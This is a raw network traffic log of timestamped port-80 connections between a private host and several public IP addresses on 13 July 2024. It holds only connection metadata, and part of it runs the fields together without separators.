Jul 13, 2024 00:03:40.536375046 CEST | 80 | 49734 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:41.148921013 CEST | 80 | 49734 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:41.148983955 CEST | 80 | 49734 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:41.149089098 CEST | 49734 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:41.151207924 CEST | 49734 | 80 | 192.168.2.6 | 203.161.41.207
Jul 13, 2024 00:03:41.157963037 CEST | 80 | 49734 | 203.161.41.207 | 192.168.2.6
Jul 13, 2024 00:03:46.184536934 CEST | 49735 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:46.190416098 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:46.190532923 CEST | 49735 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:46.192123890 CEST | 49735 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:46.199376106 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:46.647609949 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:46.647687912 CEST | 49735 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:47.707427025 CEST | 49735 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:47.712342024 CEST | 80 | 49735 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:48.726022005 CEST | 49736 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:48.732530117 CEST | 80 | 49736 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:03:48.732610941 CEST | 49736 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:03:48.734755993 CEST | 49736 | 80 | 192.168.2.6 | 3.33.130.190
                                                          Jul 13, 2024 00:03:48.740776062 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:50.122663975 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:50.129096985 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:50.242172003 CEST4973680192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:50.248642921 CEST80497363.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.256979942 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.264339924 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.264416933 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.266316891 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:51.273052931 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.275717974 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.742094994 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:51.744266987 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:52.769722939 CEST4973780192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:52.775872946 CEST80497373.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:53.792696953 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.799676895 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:53.799814939 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.802059889 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:53.808953047 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.261599064 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.263277054 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:54.263400078 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:54.264425039 CEST4973880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:54.272732973 CEST80497383.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.290575981 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.296294928 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.296370029 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.298512936 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:03:59.303881884 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.779040098 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:03:59.779520988 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:00.800756931 CEST4973980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:00.805732012 CEST80497393.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:01.818789005 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.824156046 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:01.824567080 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.828516960 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:01.833395004 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:03.332024097 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:03.339368105 CEST80497403.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:03.339418888 CEST4974080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.350075960 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.356331110 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:04.359688044 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.359688044 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:04.365782022 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:04.366827965 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:05.742002010 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:05.742980003 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:05.864594936 CEST4974180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:05.870738983 CEST80497413.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:06.882499933 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.887485027 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:06.887557983 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.889780998 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:06.894771099 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348738909 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348938942 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:07.348988056 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:07.351794004 CEST4974380192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:07.356678009 CEST80497433.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:12.442085028 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.447098970 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:12.451656103 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.451656103 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:12.456870079 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092093945 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092156887 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092190981 CEST804974451.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:13.092235088 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:13.092235088 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:13.957597971 CEST4974480192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.976349115 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.981895924 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:14.981980085 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.984235048 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:14.989387989 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616523027 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616588116 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616630077 CEST804974551.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:15.616739035 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:16.488280058 CEST4974580192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.506330967 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.511483908 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:17.514163971 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.518085957 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:17.522989988 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:17.523998976 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154594898 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154643059 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.154654026 CEST804974651.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:18.156649113 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:19.019504070 CEST4974680192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.040532112 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.045718908 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.050184965 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.054097891 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.058967113 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682537079 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682598114 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682636023 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682670116 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682696104 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.682709932 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:20.682724953 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.682754993 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.687918901 CEST4974780192.168.2.651.89.93.192
                                                          Jul 13, 2024 00:04:20.692867994 CEST804974751.89.93.192192.168.2.6
                                                          Jul 13, 2024 00:04:25.720523119 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.728102922 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:25.728537083 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.730942011 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:25.737266064 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:26.206804037 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:26.210694075 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:27.238250017 CEST4974880192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:27.243102074 CEST80497483.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:28.256640911 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.262466908 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:28.264620066 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.268542051 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:28.273515940 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:29.664052010 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:29.671358109 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:29.771295071 CEST4974980192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:29.777846098 CEST80497493.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.788647890 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.794909954 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.794989109 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.797411919 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:30.803155899 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:30.804467916 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:31.252399921 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:31.252461910 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:32.300785065 CEST4975080192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:32.316134930 CEST80497503.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.319346905 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.325869083 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.325934887 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.327718019 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.334037066 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.785254955 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.788228989 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:33.788527012 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.816519976 CEST4975180192.168.2.63.33.130.190
                                                          Jul 13, 2024 00:04:33.824390888 CEST80497513.33.130.190192.168.2.6
                                                          Jul 13, 2024 00:04:38.861799002 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.870249033 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:38.870325089 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.881293058 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:38.889267921 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.340420008 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.343009949 CEST8049752188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:39.343086958 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:40.396563053 CEST4975280192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.413079977 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.419527054 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.419589043 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.421397924 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:41.429691076 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.899492979 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.900628090 CEST8049753188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:41.900717020 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:42.925743103 CEST4975380192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.944539070 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.953843117 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:43.955631018 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.955631018 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:43.964313030 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:43.964797974 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.435503006 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.436600924 CEST8049754188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:44.444545031 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:45.457159996 CEST4975480192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.474822998 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.480170965 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.480737925 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.484648943 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.490303040 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.941668034 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.943556070 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:46.943643093 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.944426060 CEST4975580192.168.2.6188.114.96.3
                                                          Jul 13, 2024 00:04:46.951555014 CEST8049755188.114.96.3192.168.2.6
                                                          Jul 13, 2024 00:04:52.308518887 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.315694094 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:52.316006899 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.320529938 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:52.326843977 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028438091 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028507948 CEST804975645.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:53.028578997 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:53.832101107 CEST4975680192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.850604057 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.856791973 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:54.856863022 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.858742952 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:54.865078926 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566567898 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566652060 CEST804975745.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:55.566701889 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:56.364134073 CEST4975780192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.381856918 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.388559103 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:57.388636112 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.390508890 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:57.396811008 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:57.398422003 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.235800982 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.235846996 CEST804975845.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:04:58.242263079 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:58.894623995 CEST4975880192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:04:59.912451982 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.038758993 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.043647051 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.043647051 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.048690081 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780504942 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780628920 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:00.780703068 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.783267975 CEST4975980192.168.2.645.130.41.38
                                                          Jul 13, 2024 00:05:00.789743900 CEST804975945.130.41.38192.168.2.6
                                                          Jul 13, 2024 00:05:06.012540102 CEST4976080192.168.2.63.33.130.190
Jul 13, 2024 00:05:06.017540932 CEST | 80 | 49760 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:06.023060083 CEST | 49760 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:06.023060083 CEST | 49760 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:06.030365944 CEST | 80 | 49760 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:06.489455938 CEST | 80 | 49760 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:06.492536068 CEST | 49760 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:07.535376072 CEST | 49760 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:07.541213989 CEST | 80 | 49760 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:08.553622007 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:08.559952974 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:08.562771082 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:08.562772036 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:08.569382906 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:10.023957014 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:10.024193048 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:10.024528027 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:10.024852037 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:10.024853945 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:10.025284052 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:10.025366068 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:10.025366068 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:10.069233894 CEST | 49761 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:10.209520102 CEST | 80 | 49761 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:11.085272074 CEST | 49762 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:11.090270996 CEST | 80 | 49762 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:11.090342045 CEST | 49762 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:11.092232943 CEST | 49762 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:11.099102020 CEST | 80 | 49762 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:11.099431038 CEST | 80 | 49762 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:11.620640039 CEST | 80 | 49762 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:11.626144886 CEST | 49762 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:12.598136902 CEST | 49762 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:12.604756117 CEST | 80 | 49762 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:13.618124008 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.255074978 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:14.257771969 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.257771969 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.262686968 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:14.849314928 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:14.849359035 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:14.849481106 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.849873066 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:14.849921942 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.851561069 CEST | 49763 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:14.856941938 CEST | 80 | 49763 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:20.559209108 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:20.563992023 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:20.564548016 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:20.588257074 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:20.593352079 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:21.077316046 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:21.077383995 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:22.100563049 CEST | 49765 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:22.105459929 CEST | 80 | 49765 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:23.152359962 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:23.157370090 CEST | 80 | 49766 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:23.157438040 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:23.159934044 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:23.164693117 CEST | 80 | 49766 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:23.617144108 CEST | 80 | 49766 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:23.617209911 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:24.675857067 CEST | 49766 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:24.681090117 CEST | 80 | 49766 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:25.701396942 CEST | 49767 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:25.707678080 CEST | 80 | 49767 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:25.711738110 CEST | 49767 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:25.711738110 CEST | 49767 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:25.718148947 CEST | 80 | 49767 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:25.719316959 CEST | 80 | 49767 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:27.108320951 CEST | 80 | 49767 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:27.108500957 CEST | 49767 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:27.222726107 CEST | 49767 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:27.228734970 CEST | 80 | 49767 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:28.241754055 CEST | 49768 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:28.247108936 CEST | 80 | 49768 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:28.251796961 CEST | 49768 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:28.251796961 CEST | 49768 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:28.256897926 CEST | 80 | 49768 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:28.717616081 CEST | 80 | 49768 | 3.33.130.190 | 192.168.2.6
